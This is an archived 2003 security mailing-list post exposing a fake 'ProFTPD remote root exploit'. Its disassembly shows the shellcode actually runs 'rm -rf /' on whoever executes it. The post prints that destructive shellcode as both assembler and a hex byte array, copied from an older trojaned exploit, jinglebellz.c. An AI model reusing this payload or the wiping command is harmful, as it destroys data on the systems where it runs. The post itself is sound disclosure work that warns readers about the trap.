[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
Message-ID: <5.1.0.14.0.20031024213308.02c263d0@pop3.arrakis.es>
From: zeroboy at arrakis.es (zero)
Subject: ProFTPD-1.2.9rc2 remote root exploit
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Hmmm, let's see:
Dump of assembler code for function shellcode:
0x08049480 <shellcode+0>: xor %eax,%eax
0x08049482 <shellcode+2>: push %eax
0x08049483 <shellcode+3>: push $0x582f2066
0x08049488 <shellcode+8>: push $0x722d206d
0x0804948d <shellcode+13>: push $0x7258632d
0x08049492 <shellcode+18>: push $0x41414141
0x08049497 <shellcode+23>: push $0x41414141
0x0804949c <shellcode+28>: push $0x41414141
0x080494a1 <shellcode+33>: push $0x41414141
0x080494a6 <shellcode+38>: push $0x4368732f
0x080494ab <shellcode+43>: push $0x6e69622f //
/bin/shCAAAAAAAAAAAAAAAA/cXrm -rf /X
0x080494b0 <shellcode+48>: xor %eax,%eax
0x080494b2 <shellcode+50>: mov %al,0x7(%esp,1)
0x080494b6 <shellcode+54>: mov %al,0x1a(%esp,1)
0x080494ba <shellcode+58>: mov %al,0x23(%esp,1)
0x080494be <shellcode+62>: mov %esp,0x8(%esp,1)
0x080494c2 <shellcode+66>: xor %ebx,%ebx
0x080494c4 <shellcode+68>: lea 0x18(%esp,1),%ebx
0x080494c8 <shellcode+72>: mov %ebx,0xc(%esp,1)
0x080494cc <shellcode+76>: xor %ebx,%ebx
0x080494ce <shellcode+78>: lea 0x1b(%esp,1),%ebx
0x080494d2 <shellcode+82>: mov %ebx,0x10(%esp,1)
0x080494d6 <shellcode+86>: mov %eax,0x14(%esp,1)
0x080494da <shellcode+90>: xor %ebx,%ebx
0x080494dc <shellcode+92>: mov %esp,%ebx
0x080494de <shellcode+94>: lea 0x8(%esp,1),%ecx
0x080494e2 <shellcode+98>: xor %edx,%edx
0x080494e4 <shellcode+100>: lea 0x14(%esp,1),%edx
0x080494e8 <shellcode+104>: mov $0xb,%al
0x080494ea <shellcode+106>: int $0x80
0x080494ec <shellcode+108>: xor %ebx,%ebx
0x080494ee <shellcode+110>: xor %eax,%eax
0x080494f0 <shellcode+112>: inc %eax
0x080494f1 <shellcode+113>: int $0x80
0x080494f3 <shellcode+115>: add %al,(%eax)
End of assembler dump.
Let's give credits to the original c0d3rs of this shellcode. Nobody
remembers jinglebellz.c?
<snip>
/*
jinglebellz.c - local/remote exploit for mpg123
(c) 2003 GOBBLES Security seXForces
[...]
unsigned char linux_shellcode[] = /* contributed by antiNSA */
"\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xb0\x3b\x50\x31\xc0\x68\x6f"
"\x72\x74\x0a\x68\x6f\x20\x61\x62\x68\x2d\x63\x20\x74\x68\x43"
"\x54\x52\x4c\x68\x73\x2e\x2e\x20\x68\x63\x6f\x6e\x64\x68\x35"
"\x20\x73\x65\x68\x20\x69\x6e\x20\x68\x72\x66\x20\x7e\x68\x72"
"\x6d\x20\x2d\xb3\x02\x89\xe1\xb2\x29\xb0\x04\xcd\x80\x31\xc0"
"\x31\xff\xb0\x05\x89\xc7\x31\xc0\x31\xdb\x31\xc9\x31\xd2\x66"
"\xba\x70\x50\x52\xb3\x02\x89\xe1\x31\xd2\xb2\x02\xb0\x04\xcd"
"\x80\x31\xc0\x31\xdb\x31\xc9\x50\x40\x50\x89\xe3\xb0\xa2\xcd"
"\x80\x4f\x31\xc0\x39\xc7\x75\xd1\x31\xc0\x31\xdb\x31\xc9\x31"
"\xd2\x68\x66\x20\x7e\x58\x68\x6d\x20\x2d\x72\x68\x2d\x63\x58"
"\x72\x68\x41\x41\x41\x41\x68\x41\x41\x41\x41\x68\x41\x41\x41"
"\x41\x68\x41\x41\x41\x41\x68\x2f\x73\x68\x43\x68\x2f\x62\x69"
"\x6e\x31\xc0\x88\x44\x24\x07\x88\x44\x24\x1a\x88\x44\x24\x23"
"\x89\x64\x24\x08\x31\xdb\x8d\x5c\x24\x18\x89\x5c\x24\x0c\x31"
"\xdb\x8d\x5c\x24\x1b\x89\x5c\x24\x10\x89\x44\x24\x14\x31\xdb"
"\x89\xe3\x8d\x4c\x24\x08\x31\xd2\x8d\x54\x24\x14\xb0\x0b\xcd"
"\x80\x31\xdb\x31\xc0\x40\xcd\x80";
</snip>
Well well, just a nice copy paste of some of it? :pPpPpPppP
And the exact cmd is:
execve("/bin/sh", {"/bin/sh", "-c", "rm -rf /", NULL}, {"rm -rf /", NULL})
NOTE: In this one ~ is change for a nicer one /
Have a nice turkey.
Cheerz
www.citfi.org
www.podergeek.com
**********************************
"The further backward you look, the further forward you can see" Winston
Churchill
"Access is GOD..."
-----BEGIN PGP SIGNATURE-----
Version: PGPfreeware 6.5.8 for non-commercial use <http://www.pgp.com>
iQA/AwUBP5lx/Q0R8jZM93x8EQJCdwCg9HfcZVDSO8/JCA17lHdkkKT7nKEAn0C6
l9RpeQ2ZrufRkkV3dflO1dTB
=kkQd
-----END PGP SIGNATURE-----
Powered by blists - more mailing lists